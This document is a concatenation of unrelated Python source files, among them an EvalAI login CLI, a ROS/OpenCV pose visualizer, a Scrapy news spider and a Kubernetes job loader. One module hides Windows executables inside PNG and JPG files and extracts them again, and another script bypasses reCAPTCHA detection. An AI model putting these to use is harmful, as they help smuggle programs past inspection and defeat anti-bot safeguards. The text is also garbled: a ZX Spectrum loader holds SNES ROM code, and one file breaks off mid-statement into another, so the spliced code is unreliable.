""" if domain == "default": url = "http://localhost:8000/api/auth/login" auth_details = { "username": username, "password": password } response = requests.post(url, auth_details) if response.status_code == requests.codes.ok: print("You're now logged-in!") else: print("Something went wrong, please check your connection.") token = response.text json_token = json.loads(token) hashed_token = base64.b64encode(json_token["token"]) __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) outputFile = '.data' file_path = os.path.join(__location__, outputFile) with open(file_path, 'wb') as fw: pickle.dump({'Token': hashed_token}, fw) class LoginCLI(Command): "Login to EvalAI" log = logging.getLogger(__name__) def get_parser(self, prog_name): parser = super(LoginCLI, self).get_parser(prog_name) parser.add_argument('-u', '--username', help='username') parser.add_argument('-p', '--password', help='password') return parser def take_action(self, parsed_args): parsed_arg_dict = vars(parsed_args) username = parsed_arg_dict['username'] password = parsed_arg_dict['password'] login(username=username, password=password) """ Program that finds a word in a text file amazingly fast thanks to the dictionary IN operator """ import string as s def open_file(filename): try: my_file = open(filename, "r") return my_file except FileNotFoundError as f: print(f) exit() def find_in_dict(string, dictionary): """ Returns True if the key is in the dictionary, False if not """ if string in dictionary: return True return False def main(): read_file = open_file("../Cap8/romeo-full.txt") word_to_search = input("word to search: ").lower() word_to_search = word_to_search.translate(word_to_search.maketrans("", "", s.punctuation)) file_dict = {} for line in read_file: line = line.translate(line.maketrans("", "", s.punctuation)).lower() for word in line.split(): file_dict[word] = file_dict.get(word, 0) + 1 print(*[f"The word '{word_to_search}' is in the file" if find_in_dict( word_to_search, file_dict) else f"{word_to_search} is not in the file"]) print(file_dict) if __name__ == "__main__": main()Kaju-Bubanja/PoseCNNgenerate_dataset/visualize_opencv.py from common import ros_to_blender_quat, get_filename_prefix import cv2 from cv_bridge import CvBridge from export_data_from_ros_bag import fill_transformer, get_datasets, Dataset import numpy as np from pyquaternion import Quaternion import rosbag import rospy import tf import os def get_corner(tf_t, times, num_boxes): corner = [] for i in range(num_boxes): (trans, rot) = tf_t.lookupTransform("vicon", "box" + str(i + 1), rospy.Time(int(times[i][0]), int(times[i][1]))) corner.append(list(trans)) corners = np.float32(corner) return corners def calculate_point(name, K, R, t, corner): print(name + "\n\n") print("K: " + str(K)) R = np.hstack((R, t)) print("R: " + str(R)) print("T: " + str(t)) print("Corner: " + str(corner)) result = np.dot(np.dot(K, R), corner) print("By hand: " + str(result)) def calculate_point_camera(name, K, corner): print(name + "\n\n") print("K: " + str(K)) print("Corner: " + str(corner)) result = np.dot(K, corner) print("By hand camera frame: " + str(result)) def main(): datasets = get_datasets() # dataset, boxes, num_boxes, times, start_time, end_time = read_config() for dataset in datasets: times = dataset.times num_boxes = dataset.num_boxes start_time = dataset.start_time end_time = dataset.end_time bag = rosbag.Bag(os.path.join(Dataset.bags_path, dataset.name + ".bag")) topics = ["/camera/color/image_raw"] tf_t = fill_transformer(bag) 
corner_input = get_corner(tf_t, times, num_boxes) # print(corner_input) camera_matrix = np.float32([[610.55992534, 0, 306.86169342], [0, 610.32086262, 240.94547232], [0, 0, 1]]) dist = np.float32([[0.10793695], [-0.21546604], [0.00045875], [-0.00670819]]) # dist = np.float32([[0], [0], [0], [0]]) bridge = CvBridge() font = cv2.FONT_HERSHEY_SIMPLEX fontScale = 0.5 fontColor = (255, 255, 255) lineType = 2 print(start_time) print(end_time) counter = 1 for topic, msg, t in bag.read_messages(topics=topics, start_time=start_time, end_time=end_time): # print(msg.header.stamp) if topic == "/camera/color/image_raw": try: (trans, rot) = tf_t.lookupTransform("camera", "vicon", msg.header.stamp) except tf.ExtrapolationException: pass trans = np.float32([[trans[0]], [trans[1]], [trans[2]]]) camera_quat = Quaternion(ros_to_blender_quat(rot)) camera_rodrigues, jacobian = cv2.Rodrigues(camera_quat.rotation_matrix) image = bridge.imgmsg_to_cv2(msg, "bgr8") corners, jacobian = cv2.projectPoints(corner_input, camera_rodrigues, trans, camera_matrix, dist) corner_counter = 1 for corner in corners: corner = tuple(corner[0]) if corner[0] > 0 and corner[1] > 0: cv2.circle(image, corner, 3, (255, 0, 0), -1) cv2.putText(image, str(corner_counter), corner, font, fontScale, fontColor, lineType) corner_counter += 1 prefix = get_filename_prefix(counter) mask_name = os.path.join(Dataset.data_output_path, dataset.name, prefix + "-label.png") mask = cv2.imread(mask_name) alpha = 0.5 image_with_mask = cv2.addWeighted(mask, alpha, image, 1 - alpha, 0) w = 1280 h = 960 image_with_mask = cv2.resize(image_with_mask, (w, h)) cv2.resizeWindow("Image", w, h) cv2.imshow("Image", image_with_mask) cv2.waitKey(100) counter += 1 if __name__ == "__main__": main() from tg import expose from helloworld.lib.base import BaseController class RootController(BaseController): @expose() def welcome(self): return "Hello World!" from .errors import * end_hex = b"\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82" class PNG: """ Function for PNG. - ----- Parameter : - image_path: `str` | Set PNG file to modify ----- Methods : - hide_message - hide_program - reveal_message - reveal_program """ def __init__(self, image_path:str): if image_path == None: raise CannotNone("image_path") self.image_path = image_path def hide_message(self, message:str): """ Method to hide message in PNG file. ----- Parameter : - message: `str` | Messages that want to hide """ if message == None: raise CannotNone("message") encoded_msg = str.encode(message) with open(self.image_path, 'ab') as f: f.write(encoded_msg) print("Success!") def hide_program(self, program_path:str): """ Method to hide program (`.exe`) in PNG file. ----- Parameter : - program_path: `str` | Program that want to hide """ if program_path == None: raise CannotNone("program_path") if ".exe" in program_path: pass else: program_path = program_path + ".exe" with open(self.image_path, 'ab') as f, open(program_path, 'rb') as p: f.write(p.read()) print("Success!") def reveal_message(self, encoding:str="UTF-8"): """ Method to reveal secret message in PNG file. ----- Parameter : - encoding: `str` | Default: `UTF-8` """ with open(self.image_path, 'rb') as f: content = f.read() offset = content.index(end_hex) f.seek(offset + len(end_hex)) return f.read().decode(encoding) def reveal_program(self, new_name:str): """ Method to reveal secret program and create new file (`.exe`) from inside PNG file. 
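The payload is assumed to be everything appended after the PNG IEND chunk
(`end_hex`); those trailing bytes are copied verbatim into the new `.exe` file.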
- Parameter : - new_name: `str` | Set name for files from PNG """ if new_name == None: raise CannotNone("new_name") if ".exe" in new_name: pass else: new_name = new_name + ".exe" with open(self.image_path, 'rb') as f: content = f.read() offset = content.index(end_hex) f.seek(offset + len(end_hex)) new_name = str(new_name) with open(new_name, 'wb') as p: p.write(f.read()) print("Success!") class JPG: """ Function for JPG/JPEG. - ----- Parameter : - image_path: `str` | Set PNG file to modify ----- Methods : - hide_message - hide_program - reveal_message - reveal_program """ def __init__(self, image_path:str): if image_path == None: raise CannotNone("image_path") self.image_path = image_path def hide_message(self, message:str): """ Method to hide message in JPG/JPEG file. ----- Parameter : - message: `str` | Messages that want to hide """ if message == None: raise CannotNone("message") encoded_msg = str.encode(message) with open(self.image_path, 'ab') as f: f.write(encoded_msg) print("Success!") def hide_program(self, program_path:str): """ Method to hide program (`.exe`) in JPG/JPEG file. ----- Parameter : - program_path: `str` | Program that want to hide """ if program_path == None: raise CannotNone("program_path") if ".exe" in program_path: pass else: program_path = program_path + ".exe" with open(self.image_path, 'ab') as f, open(program_path, 'rb') as p: f.write(p.read()) print("Success!") def reveal_message(self, encoding:str="UTF-8"): """ Method to reveal secret message in JPG/JPEG file. ----- Parameter : - encoding: `str` | Default: `UTF-8` """ with open(self.image_path, 'rb') as f: content = f.read() offset = content.index(bytes.fromhex('FFD9')) f.seek(offset + 2) return f.read().decode(encoding) def reveal_program(self, new_name:str): """ Method to reveal secret program and create new file (`.exe`) from inside JPG/JPEG file. - Parameter : - new_name: `str` | Set name for files from JPG/JPEG """ if new_name == None: raise CannotNone("new_name") if ".exe" in new_name: pass else: new_name = new_name + ".exe" with open(self.image_path, 'rb') as f: content = f.read() offset = content.index(bytes.fromhex('FFD9')) f.seek(offset + 2) new_name = str(new_name) with open(new_name, 'wb') as p: p.write(f.read()) print("Success!") ''' Return the number of even ints in the given array. Note: the % "mod" operator computes the remainder, e.g. 5 % 2 is 1. ''' def count_evens(nums): count = 0 for i in nums: if i % 2 == 0: count += 1 return count # Copyright 2011-2012 Yelp # Copyright 2016 Yelp # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
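# Added commentary on the setup script below: setuptools-only keywords
# (provides, test_suite, tests_require) are passed only when setuptools can be
# imported; tests_require is then widened per interpreter - unittest2 on
# Python < 2.7, MySQL-python on Python 2, mysql-connector everywhere except
# 3.0-3.2, and oursql/oursql3 only on CPython.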
import platform import sys import doloop try: from setuptools import setup # arguments that distutils doesn't understand setuptools_kwargs = { 'provides': ['doloop'], 'test_suite': 'tests.suite.load_tests', 'tests_require': ['PyMySQL'], } # unittest2 is a backport of unittest from Python 2.7 if sys.version_info < (2, 7): setuptools_kwargs['tests_require'].append('unittest2') # only add MySQLdb for Python 2 if sys.version_info < (3, 0): setuptools_kwargs['tests_require'].append('MySQL-python') # mysql-connector doesn't work on Python 3.2 (this happens for pypy3) if sys.version_info < (3, 0) or sys.version_info >= (3, 3): setuptools_kwargs['tests_require'].append('mysql-connector') # oursql seems not to work right with PyPy if platform.python_implementation() == 'CPython': if sys.version_info < (3, 0): setuptools_kwargs['tests_require'].append('oursql') else: setuptools_kwargs['tests_require'].append('oursql3') except ImportError: from distutils.core import setup setuptools_kwargs = {} setup( author='', author_email='', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Topic :: Database', ], description='Task loop for keeping things updated', entry_points=dict( console_scripts=[ 'create-doloop-table=doloop:_main_for_create_doloop_table' ], ), license='Apache', long_description=open('README.rst').read(), name='doloop', py_modules=['doloop'], url='http://github.com/Yelp/doloop', version=doloop.__version__, **setuptools_kwargs ) #!/usr/bin/env python # -*- coding: utf-8 -*- # # Author: # Author: # Email: # Description: Examine multiples VSs and generates a resume of the results. 
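# Example invocation (illustrative; the script name is hypothetical, the flags
# come from the argparse definition below):
#     python join_vs_results.py VS_AD_run1 VS_GL_run1 -r receptor.pdb -o lst_out.txt
# At least two execution folders are required, and each folder name must carry
# the 'VS_<software>' tag that is used to label the columns of the resume.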
# ______________________________________________________________________________________________________________________ import argparse import glob import json import os from os.path import dirname, join import os.path from collections import OrderedDict from subprocess import Popen, PIPE, STDOUT import datetime from shutil import copyfile import tarfile import time FORMAT_OUT = 'lst_{}{}.txt' PYTHON_RUN = "python " JOIN_CL_SESSIONS = "MetaScreener/extra_metascreener/results/join/join_cl_json_vs_session.py" F_JOIN_SESSIONS = PYTHON_RUN + ' ' + JOIN_CL_SESSIONS + ' -f {} -d {} -r {} -o {} -v' parser = argparse.ArgumentParser() parser.add_argument('folder', type=str, nargs='+', help='Execution folders (2 at least) ') parser.add_argument('-r', '--receptor', default='', type=str) parser.add_argument('-o', '--output', default='', type=str, help='name of output file') args = parser.parse_args() if len(args.folder) == 1: parser.print_help() exit() def read_energies(dir): dct = {} with open(dir + "/Results_scoring.csv") as csv: line = csv.readline() # header line = csv.readline() cnt = 1 while line: line.strip() key = line.split(';')[4] data = float(line.split(';')[0]) data2 = str(line.split(';')[-1]) dct[key] = [data, data2.replace("\n", " ")] line = csv.readline() cnt += 1 return dct def make_tarfile(source_dir, output_filename): with tarfile.open(output_filename, "w:gz") as tar: tar.add(source_dir, arcname=os.path.basename(source_dir)) def execute_cmd(cmd): p = Popen(cmd, stdout=PIPE, stderr=STDOUT, shell=True) for line in iter(p.stdout.readline, b''): print(line.strip()) p.stdout.close() p.wait() directories = '' all = OrderedDict() first_sw = "" name_out = '' ORDER = False start = time.time() for dir in args.folder: index = dir.find('VS_') directories += '{} '.format(dir) sw = dir[index + 3:index + 5] if (sw not in name_out): name_out += '{}_'.format(sw) if (sw == "LS"): print("Software LS is not supported") exit() energies = read_energies(dir) if len(energies) > 0: ORDER = True if sw in all.keys(): all[sw].update(energies) else: all[sw] = energies if first_sw == "": first_sw = sw if ORDER: for sw in all.keys(): all[sw] = OrderedDict(sorted(all[sw].items(), key=lambda x: x[1])) print("Time for read and sort all single energy files: %s seconds " % (time.time() - start)) name_out = name_out[:-1] if args.output == '': prefix_out = os.path.basename(args.folder[0]) prefix_out = prefix_out[prefix_out.find(first_sw) + len(first_sw):] file_out = FORMAT_OUT.format(name_out, prefix_out) else: file_out = args.output header = " Rank ".join(all.keys()) + " Rank Molecule" header = ", ".join(all.keys()) print(file_out) f_out = open(file_out, 'w') print(header) f_out.write('{}\n'.format(header)) rank = 1; print("Total number of softwares: " + str(len(all))) start = time.time() if len(all) == 0: print("No results have been found") exit() for molecule in all[first_sw]: score = all[first_sw][molecule][0] path = all[first_sw][molecule][1] aux = "" for sw in all.keys(): if sw != first_sw: if all[sw].has_key(molecule): result = all[sw][molecule] aux += '{} {} {}'.format(all[sw].keys().index(molecule)+1, result[0], result[1] ) else: aux += "-- -- --" print(' {} {} {} {} {}'.format(rank, score, path, aux, molecule)) f_out.write(' {} {} {} {} {}\n'.format(rank, score, path, aux, molecule)) rank += 1 f_out.close() print("Time for cross all softwares results: %s seconds " % (time.time() - start)) if (args.receptor): if (os.path.isfile(args.receptor)): out_join = file_out[:file_out.rindex("_")] cmd = 
F_JOIN_SESSIONS.format(file_out, directories, args.receptor, out_join) f_cl = output = '{}_{}'.format(out_join, datetime.date.today()) print(cmd) execute_cmd(cmd) copyfile(file_out, join(f_cl, file_out)) make_tarfile(f_cl, '{}.tar.gz'.format(f_cl)) else: print("Error receptor does not exists") tests/unit/contrib/consul/conftest.py0 import pytest from sitri.contrib.consul import ConsulConfigProvider from .mock import ConsulMock @pytest.fixture(scope="module") def consul_connection() -> ConsulMock: return ConsulMock() @pytest.fixture(scope="module") def consul_config(consul_connection) -> ConsulConfigProvider: return ConsulConfigProvider(consul_connection=consul_connection, folder="test/") disco/disco_update_icecast2.py # disco_update_icecast2 # # Should be configured to run after the Disco server starts up. import urllib.parse import urllib.request import subprocess import time username = "" password = "" hostname = "" port = "" mountpoint = "/disco" playlist_command = "disco --playlist" while True: playlist = subprocess.check_output(playlist_command, shell=True, bufsize=1).decode("utf-8").split('\n') current = playlist[0].split(',') artist = urllib.parse.quote(current[1].replace('"', '')) song = urllib.parse.quote(current[2].replace('"', '')) url = "http://{:s}:{:s}/admin/metadata?mount={:s}&mode=updinfo&song={:s}+-+{:s}".format(hostname, port, mountpoint, artist, song) # From https://docs.python.org/3.1/howto/urllib2.html password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm() top_level_url = url password_mgr.add_password(None, top_level_url, username, password) handler = urllib.request.HTTPBasicAuthHandler(password_mgr) opener = urllib.request.build_opener(handler) opener.open(url) urllib.request.install_opener(opener) time.sleep(5) import asyncio from pyppeteer import launch import fuckcaptcha as fucking import sys async def main(): browser = await launch(headless=False) page = await browser.newPage() await fucking.bypass_detections(page) await page.goto("https://www.google.com/recaptcha/api2/demo") while True: await asyncio.sleep(1) if sys.platform == "win32": loop = asyncio.ProactorEventLoop() else: loop = asyncio.new_event_loop() # workaround for KeyboardInterrupt on wangblows async def wake_the_fuck_up(): while True: await asyncio.sleep(1) loop.create_task(wake_the_fuck_up()) loop.run_until_complete(main()) gillbam/pcnio_util.py ''' MIT License Copyright (c) 2018 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
''' import numpy as np import open3d as o3d def read_pcd(filename): pcd = o3d.io.read_point_cloud(filename) return np.array(pcd.points) def save_pcd(filename, points): pcd = o3d.geometry.PointCloud() pcd.points = o3d.utility.Vector3dVector(points) o3d.io.write_point_cloud(filename, pcd) import create2api import json # We'll use this to format the output bot = create2api.Create2() bot.start() bot.safe() print '==============Start Up Data==============' print json.dumps(bot.sensor_state, indent=4) print '=========================================' print '' #Packet 100 contains all sensor data. bot.get_packet(100) print '==============Updated Sensors==============' print json.dumps(bot.sensor_state, indent=4, sort_keys=False) witms/spiders/wp.py0 from scrapy import Spider from scrapy.linkextractors import LinkExtractor from witms.items import Article from witms.loaders import ArticleLoader class WashingtonPostSpider(Spider): name = "wp" portal_name = "Washington Post" allowed_domains = ["washingtonpost.com"] start_urls = ["https://www.washingtonpost.com/"] link_extractor = LinkExtractor( deny=[ "/people/", "commerce.washingtonpost.com", "realestate.washingtonpost.com", "stats.washingtonpost.com", ] ) def parse(self, response): loader = ArticleLoader(item=Article(), response=response) loader.add_value("url", response.url) loader.add_value("portal", WashingtonPostSpider.portal_name) loader.add_xpath("section", '//meta[@property="article:section"]/@content') loader.add_xpath("section", '//meta[@itemprop="articleSection"]/@content') loader.add_css("authors", "a[class*=author-name] *::text") loader.add_css("title", "h1 *::text") loader.add_xpath("title", '//meta[@name="title"]/@content') loader.add_xpath("title", '//meta[@property="og:title"]/@content') loader.add_xpath("description", '//meta[@name="description"]/@content') loader.add_xpath("description", '//meta[@property="og:description"]/@content') loader.add_css("content", "div[class=article-body] *::text") loader.add_xpath("content", "//article//p//text()") loader.add_xpath("content", "//p//text()") loader.add_xpath( "publish_timestamp", '//meta[@property="article:published_time"]/@content' ) loader.add_xpath( "publish_timestamp", '//time[@itemprop="datePublished"]/@datetime' ) loader.add_xpath( "publish_timestamp", "//script//text()", re=r'"datePublished":\s*"(.*?)"' ) loader.add_xpath( "update_timestamp", '//meta[@property="article:modified_time"]/@content' ) loader.add_xpath( "update_timestamp", '//time[@itemprop="dateModified"]/@datetime' ) loader.add_xpath( "update_timestamp", "//script//text()", re=r'"dateModified":\s*"(.*?)"' ) yield loader.load_item() for link in self.link_extractor.extract_links(response): yield response.follow(link.url, callback=self.parse) """ Peasauce - interactive disassembler Copyright (C) 2012-2017 Licensed using the MIT license. """ import pickle import os import struct import sys import logging from .. 
import constants logger = logging.getLogger("loader-zxspectrum-z80") OFFSET_V1_PROGRAM_COUNTER = 6 OFFSET_V23_HEADER_LENGTH = 30 LENGTH_V1_HEADER = 30 LENGTH_V2_HEADER = 23 LENGTH_V3_HEADER_A = 54 LENGTH_V3_HEADER_B = 55 class File(object): EXPECTED_SUFFIX = "z80" header_page_count_8kb: int = 0 def identify_input_file(input_file, file_info, data_types, f_offset=0, f_length=None): result = constants.MatchResult() if file_info.has_file_name_suffix(File.EXPECTED_SUFFIX): result.confidence = constants.MATCH_POSSIBLE # Check expected values input_file.seek(f_offset + OFFSET_V1_PROGRAM_COUNTER) header1_pc = data_types.uint16(input_file.read(2)) if header1_pc == 0: input_file.seek(f_offset + OFFSET_V23_HEADER_LENGTH) header2_length = data_types.uint16(input_file.read(2)) if header2_length == LENGTH_V2_HEADER: result.file_format_id = constants.FileFormat.ZXSPECTRUM_Z80_2 elif header2_length in (LENGTH_V3_HEADER_A, LENGTH_V3_HEADER_B): result.file_format_id = constants.FileFormat.ZXSPECTRUM_Z80_3 if result.file_format_id != constants.FileFormat.UNKNOWN: result.confidence = constants.MATCH_PROBABLE else: result.file_format_id = constants.FileFormat.ZXSPECTRUM_Z80_1 if result.file_format_id != constants.FileFormat.UNKNOWN: result.platform_id = constants.PLATFORM_ZXSPECTRUM return result def load_input_file(input_file, file_info, data_types, f_offset=0, f_length=None): return load_z80_file(file_info, data_types, input_file, f_offset, f_length) def load_z80_file(file_info, data_types, f, f_offset=0, f_length=None): f.seek(f_offset, os.SEEK_SET) # Offset Bytes ... data = File() # 0 2 8kb page count data.header_page_count_8kb = data_types.uint16(f.read(2)) # 2 1 emulation mode? f.read(1) # 3 5 reserved f.read(5) # 8 1 0xAA id_byte1 = data_types.uint8(f.read(1)) if id_byte1 != 0xAA: logger.debug("snes/romfile.py: load_smc_file: expected 0xAA at offset 8, got %02X." % id_byte1) return False # 9 1 0xBB id_byte2 = data_types.uint8(f.read(1)) if id_byte2 != 0xBB: logger.debug("snes/romfile.py: load_smc_file: expected 0xBB at offset 9, got %02X." % id_byte2) return False # 10 1 game type? game_type = data_types.uint8(f.read(1)) if game_type != 4: logger.debug("snes/romfile.py: load_smc_file: unknown game type %d." % game_type) return False rom_offset = f_offset + 512 f.seek(f_offset + 512, os.SEEK_SET) lohi_page_sizes = [ 0x8000, 0x10000 ] def read_rom_header(page_size): """ There are several types of ROM: LoROM $20 HiROM $21 LoROM / FastROM $30 HiROM / FastROM $31 ExLoROM $32 ExHiROM $35 The checksum and checksum complement once or'd together, should produce 0xFFFF. """ f.seek(rom_offset + page_size - 64, os.SEEK_SET) game_title = f.read(21) # xxC0-xxD4 lohifastex_byte = data_types.uint8(f.read(1)) # xxD5 rom_type = data_types.uint8(f.read(1)) # xxD6 rom_size = data_types.uint8(f.read(1)) # xxD7 sram_size = data_types.uint8(f.read(1)) # xxD8 license_id_code = data_types.uint16(f.read(2)) # xxD9-xxDA version_number = data_types.uint8(f.read(1)) # xxDB checksum_complement = data_types.uint16(f.read(2)) # xxDC-xxDD checksum = data_types.uint16(f.read(2)) # xxDE-xxDF if checksum | checksum_complement != 0xFFFF: logger.debug("snes/romfile.py: load_smc_file: skipping page ending %06X, checksum mismatch." % page_size) return False idx_HiROM = lohifastex_byte & 0x01 if page_size != lohi_page_sizes[idx_HiROM]: logger.debug("snes/romfile.py: load_smc_file: skipping page ending %06X, size mismatch." 
% page_size) return False f.read(4) # xxE0-xxE3 native_mode_vector_COP = data_types.uint16(f.read(2)) # xxE4-xxE5 native_mode_vector_BRK = data_types.uint16(f.read(2)) # xxE6-xxE7 native_mode_vector_ABORT = data_types.uint16(f.read(2)) # xxE8-xxE9 native_mode_vector_NMI = data_types.uint16(f.read(2)) # xxEA-xxEB native_mode_vector_RESET = data_types.uint16(f.read(2)) # xxEC-xxED native_mode_vector_IRQ = data_types.uint16(f.read(2)) # xxEE-xxEF f.read(4) # xxF0-xxF3 emulation_mode_vector_COP = data_types.uint16(f.read(2)) # xxF4-xxF5 emulation_mode_vector_ABORT = data_types.uint16(f.read(2)) # xxF6-xxF7 emulation_mode_vector_NMI = data_types.uint16(f.read(2)) # xxF8-xxF9 emulation_mode_vector_RESET = data_types.uint16(f.read(2)) # xxFA-xxFB emulation_mode_vector_BRK = data_types.uint16(f.read(2)) # xxFC-xxFD emulation_mode_vector_IRQ = data_types.uint16(f.read(2)) # xxFE-xxFF return True for page_size in lohi_page_sizes: if read_rom_header(page_size): break else: logger.debug("snes/romfile.py: load_smc_file: failed to locate valid header.") return False return True SAVEFILE_VERSION = 1 def save_project_data(f, data): f.write(struct.pack("AtzeDeVries/jobernetes """ Class creates a job model from a directory structure. """ import logging import os.path import yaml import json class JobModel: def __init__(self,path='jobermodel.yaml', source_type='file'): """ Initialized Jobmodel (path=jobmodel,source_type='file') """ self.log = logging.getLogger(__name__) self.log.debug('Initialized JobModel') self.path = path source_type = 'file' #shameless override (git/url should beimplemented) #if not type directory validate path if source_type == 'file': self.log.debug('Checking if path: "%s" exsists' % path) if not os.path.exists(path): self.log.error('Path does not exist or is not readable: "%s"' % path) exit(1) #validate source type options source_type_options = ['file','git','url'] if not source_type in source_type_options: self.log.error('ERROR: sourcetype should be one of %s' % source_type_options) exit(1) def get_jobmodel(self): """ Returns a phases Object """ with open(self.path, 'rt') as f: self.log.debug('Opening jobermodel "%s"' % self.path) phases = yaml.safe_load(f.read())['jobernetes'] self.__validate_jobmodel(phases) for phase in phases: self.__explode_directory(phase) self.__extend_jobmodel(phases) self.log.info('Imported jobermodel from "%s"' % self.path) return phases def __extend_jobmodel(self,phases): count = 0 for phase in phases: for job in phase['jobs']: job['kube_job_definition'] = self.__get_kube_job_definition(job['job_path']) job['kube_job_definition']['metadata']['labels']['jobernetes_job_name'] = job['name'] job['kube_job_definition']['metadata']['labels']['jobernetes_phase'] = str(count) job['kube_job_definition']['metadata']['labels']['jobernetes_exploded'] = str('type' in job and job['type']=='exploded') count += 1 def __explode_directory(self,phase): new_job_array = [] for job in phase['jobs']: if self.__is_job_type_directory(job): count = 0 for f in self.__directory_filelist(job): appender = {'name': job['name'], 'job_path': f, 'type': 'exploded'} if 'depends_on' in job: appender['depends_on'] = job['depends_on'] count += 0 new_job_array.append(appender) else: new_job_array.append(job) phase['jobs'] = new_job_array return phase def __validate_jobmodel(self,phases,dry_run=False): """ Validates the Jobmodel * checks if job path exist * checks if job path is correct * checks if dependencies exists * checks if phase/job names are unique (to be implemented) * checks names on 
spaces (not allowed) * check if a phase has at least one job without dependency * Should check for circle dependencies """ ok=True names_list = [] for phase in phases: self.log.debug('Checking phase: "%s"' % phase['phase_name']) non_dependend_jobs = False names_list.append(phase['phase_name']) if not self.__is_name_ok(phase['phase_name']): ok = False for job in phase['jobs']: #validate paths names_list.append(job['name']) if not self.__is_name_ok(job['name']): ok=False self.log.debug('Check if path "%s" exists' % job['job_path']) if not os.path.exists(job['job_path']): ok=False self.log.warn('Path does not exist or is not readable: "%s"' % job['job_path']) else: self.log.debug('Check if path "%s" is dir or file' % job['job_path'] ) if 'type' in job and job['type'] == 'directory': if os.path.isfile(job['job_path']): ok=False self.log.warn('Job is a directory but path is a ' 'file "%s"'% job['job_path']) else: if os.path.isdir(job['job_path']): ok=False self.log.warn('Job is a file but path is a ' 'directory "%s"'% job['job_path']) #validate dependencies if 'depends_on' in job: for dep in job['depends_on']: self.log.debug('Check if dependencies "%s" from job ' '"%s" exists' % (dep,job['name'])) if not self.__validate_dependency(phase,dep): ok=False self.log.warn('Dependency "%s" of job "%s" does ' 'not exist' % (dep,job['name'])) if not 'depends_on' in job or len(job['depends_on']) == 0: non_dependend_jobs = True if not non_dependend_jobs: ok = False if not len(names_list) == len(set(names_list)): ok = False if not dry_run and not ok: self.log.error('Validation of jobermodel failed, exiting.') exit(1) def __is_name_ok(self,name): """ check if name contains spaces. Should be extened to a more intellegent solution """ return len(name.split()) == 1 def __validate_dependency(self,current_phase,dependency): """ Validates a depenency, returns True/False Requires 'current_phase' and 'depenceny' """ for job in current_phase['jobs']: if job['name'] == dependency: return True return False def __is_job_type_directory(self,job): return 'type' in job and job['type'] == 'directory' def __directory_filelist(self,job): """ Only use if jobtype is directory. 
:param: job (dict type: directory) :returns: array of files in job directory """ filelist = [] for _, _, files in os.walk(job['job_path']): for job_file in files: self.log.debug('Checking file %s' % job_file) if job_file.split('.')[-1] in ['yml','yaml','json']: filelist.append(os.path.join(job['job_path'],job_file)) return filelist def __get_kube_job_definition(self,job_path): """ TODO: validate is yaml/json is a job """ if job_path.split('.')[-1] in ['yml','yaml']: with open(job_path) as f: self.log.debug('Opening kubejob "%s"' % job_path) return yaml.safe_load(f.read()) elif job_path.split('.')[-1] in ['json']: with open(job_path) as f: self.log.debug('Opening kubejob "%s"' % job_path) return json.safe_load(f.read()) else: self.log.error('Fail, jobpath: "%s" should be yml,yaml or json') exit(1) interventi/migrations/0001_initial.py # Generated by Django 2.2.1 on 2019-05-27 10:15 from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Fornitore', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('nome', models.CharField(max_length=250)), ('tipo_servizio_offerto', models.CharField(max_length=200)), ('indirizzo', models.CharField(blank=True, max_length=250)), ('citta', models.CharField(blank=True, max_length=200)), ('referente', models.CharField(blank=True, max_length=200)), ('email', models.EmailField(blank=True, max_length=200)), ('telefono', models.CharField(blank=True, max_length=200)), ('annotazioni', models.TextField(blank=True)), ], options={ 'verbose_name_plural': 'Fornitori', }, ), migrations.CreateModel( name='PuntoVendita', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('nome', models.CharField(max_length=250)), ('indirizzo', models.CharField(blank=True, max_length=250)), ('citta', models.CharField(blank=True, max_length=200)), ('responsabile', models.CharField(blank=True, max_length=200)), ('email', models.EmailField(blank=True, max_length=200)), ('telefono', models.CharField(blank=True, max_length=200)), ('annotazioni', models.TextField(blank=True)), ('fornitori_preferiti', models.ManyToManyField(blank=True, related_name='punti_vendita', to='interventi.Fornitore')), ('utenti_preferiti', models.ManyToManyField(blank=True, related_name='punti_vendita', to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'PuntiVendita', }, ), ] import logging from contextlib import contextmanager import json import pickle import random from functools import wraps from unittest.mock import patch from kafka.consumer.fetcher import ConsumerRecord from kafka import ( KafkaClient, KafkaConsumer, ) from kafka.protocol.message import Message from kafka.structs import TopicPartition from django.utils.functional import cached_property from django.utils.timezone import ( datetime, utc, ) from kafka_consumer.subscribers.base import BaseSubscriber from 